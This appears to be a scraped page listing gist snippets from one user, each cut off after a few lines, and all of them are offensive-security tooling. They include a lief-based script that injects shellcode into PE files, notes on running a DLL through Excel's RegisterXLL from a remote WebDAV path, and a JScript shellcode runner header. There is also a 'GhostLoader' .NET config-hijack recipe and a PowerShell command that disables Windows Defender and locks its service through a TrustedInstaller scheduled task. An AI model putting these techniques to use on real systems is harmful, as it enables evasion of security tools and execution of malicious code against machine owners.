djhohnstein

// ref: https://opensource.apple.com/source/dyld/[VERSION]/launch-cache/dsc_extractor.cpp.auto.html

// > SDKROOT=`xcrun --sdk macosx --show-sdk-path`
// > clang++ -o extract extract.cpp
// > mkdir libraries
// > ./extract /System/Library/dyld/dyld_shared_cache_x86_64 `pwd`/libraries/

#include <stdio.h>
#include <stddef.h>
#include <dlfcn.h>

djhohnstein

[
    [
        "NtLockProductActivationKeys",
        [
            "UInt32 *",
            "UInt32 *"
        ]
    ],
    [
        "NtLockProductActivationKeys",

djhohnstein

import sys

try:
  import re
  import base64
  from hashlib import sha256
  from binascii import hexlify, unhexlify
  from Crypto.Cipher import AES
  from xml.dom import minidom
  from pprint import pprint

djhohnstein

#!/usr/bin/env python3

import re
import sys
import base64
from hashlib import sha256
from binascii import hexlify, unhexlify
from Crypto.Cipher import AES
from xml.dom import minidom
from pprint import pprint

djhohnstein

import lief
import struct
import argparse

def main( f = None, n = None, s = None, o = None ):
    try:
        peobj = lief.parse( f );
        scraw = open( s, 'rb+' ).read( );
    except FileNotFoundError:
        print('[!] {} does not exist. Pass a valid file path.'.format( args.s ));

djhohnstein

DLL Execution via Excel.Application RegisterXLL() method

A DLL can be loaded and executed via Excel by initializing the Excel.Application COM object and passing a DLL to the RegisterXLL method. The DLL path does not need to be local, it can also be a UNC path that points to a remote WebDAV server.

When delivering via WebDAV, it should be noted that the DLL is still written to disk but the dropped file is not the one loaded in to the process. This is the case for any file downloaded via WebDAV, and they are stored at: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV\.

The RegisterXLL function expects an XLL add-in which is essentially a specially crafted DLL with specific exports. More info on XLL's can be found on MSDN

The XLL can also be executed by double-clicking the .xll file, however there is a security warning. @rxwx has more notes on this here inc

djhohnstein

package main

/*
Example Go program with multiple .NET Binaries embedded

This requires packr (https://github.com/gobuffalo/packr) and the utility. Install with:
	$ go get -u github.com/gobuffalo/packr/packr

Place all your EXEs are in a "binaries" folder

djhohnstein

$cmdline = '/C sc.exe config windefend start= disabled && sc.exe sdset windefend D:(D;;GA;;;WD)(D;;GA;;;OW)'

$a = New-ScheduledTaskAction -Execute "cmd.exe" -Argument $cmdline
Register-ScheduledTask -TaskName 'TestTask' -Action $a

$svc = New-Object -ComObject 'Schedule.Service'
$svc.Connect()

$user = 'NT SERVICE\TrustedInstaller'
$folder = $svc.GetFolder('\')

djhohnstein

import System;
import System.Runtime.InteropServices;
import System.Reflection;
import System.Reflection.Emit;
import System.Runtime;
import System.Text;
 
//C:\Windows\Microsoft.NET\Framework\v2.0.50727\jsc.exe Shellcode.js
//C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe Shellcode.js
 

djhohnstein

GhostLoader Steps :)

1. Create C:\Tools
2. Copy Some .NET, any .NET binary to C:\Tools
3. In this example, we use FileHistory.exe, but any .NET app will do.
4. Ensure FileHistory.exe.config is in the same path
5. Execute C:\Tools\FileHistory.exe